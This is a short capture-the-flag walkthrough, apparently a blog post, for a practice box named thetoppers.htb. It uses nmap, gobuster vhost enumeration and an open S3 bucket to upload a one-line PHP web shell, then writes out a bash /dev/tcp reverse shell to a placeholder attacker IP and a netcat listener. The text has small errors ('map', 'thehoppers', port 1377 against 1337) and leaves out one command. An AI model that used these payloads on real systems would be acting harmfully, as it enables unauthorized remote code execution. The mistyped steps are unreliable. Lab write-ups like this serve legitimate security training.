top of page


As usual let's start with nmap

map -sV -sC targetIp

Let's add the target Ip in the /etc/hosts file

cd /etc
sudo nano hosts

We found port 80 is open. So let's check the website:

Now let's use gobuster to enumerate any subdomains

gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb --append-domain

we found s3.thetoppers.htb

Let's add s3.thetoppers.htb in the /etc/hosts file too

We can interact with the S3 bucket using awscli

sudo apt install awscli
aws configure

just type "temp" for everything

We can list all of the S3 buckets hosted by the server using ls command

aws --endpoint=http://s3.thehoppers.htb s3 ls

we can use the ls command to list objects and common prefixes under the specified bucket

aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb

we can see files index.php and .htaccess and a directory called images in the S3 bucket

it looks like apache server is using this s3 bucket as storage

We can use awscli not only to read files using ls but we can also copy files to a remote bucket.

First let's create the shell.php that contains the code below:

<?php system($_GET["cmd"]); ?>

now let's copy shell.php onto the remote bucket using:

aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb

we have successfully uploaded shell.php onto the bucket

let's go back to our browser and type:


this confirms we got code execution on the box

Now, through a reverse shell we will now trigger the victim to connect back to our attacker's machine.

let's get a reverse shell by creating a new file containing:

bash -i >& /dev/tcp/<attackerIP>/1337 0>&1

now let's listen on port 1377 using

nc -lnvp 1337

now we need to host the onto our web server

let's create a local web server using:

python3 -m http.server 8000

we can use curl to fetch the file from our local host and then pipe it to bash in order to execute it


let's go back to our netcat listener and we got the shell!

the flag is in the flag.txt file

124 views0 comments

Recent Posts

See All




Rated 0 out of 5 stars.
No ratings yet

Add a rating
bottom of page